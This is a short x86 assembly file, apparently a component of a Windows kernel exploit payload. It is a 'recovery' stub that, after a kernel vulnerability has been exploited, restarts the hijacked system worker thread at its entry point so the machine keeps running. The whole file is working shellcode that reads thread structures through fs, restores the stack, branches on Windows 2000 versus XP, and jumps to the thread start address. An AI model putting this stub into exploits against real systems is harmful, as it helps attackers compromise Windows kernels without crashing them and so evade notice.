bits 32

;
; This recovery method works by restarting the calling thread at its entry
; point.  This is most likely only going to be safe for vulnerabilities that
; occur in the context of a system worker thread without any locks being
; held.  This recovery implementation is designed to work from the context of
; something that runs in a system worker thread.
;

entry:
	push byte 0x24
	pop  ebx
	inc  bh
	mov  edx, [fs:ebx]
	inc  bh
	mov  esp, [edx+0x18]
	sub  esp, ebx
	add  ebx, edx
	
	cmp  byte [0xffdf0270], 0x1
	jl   win2k

winxp:
	mov  eax, [ebx]
	sub  esp, byte 0x2c
	jmp  short call_start_address	

win2k:
	mov  eax, [ebx+0xc]
	sub  esp, byte 0x30

call_start_address:
;	sub  sp, bx
	jmp  eax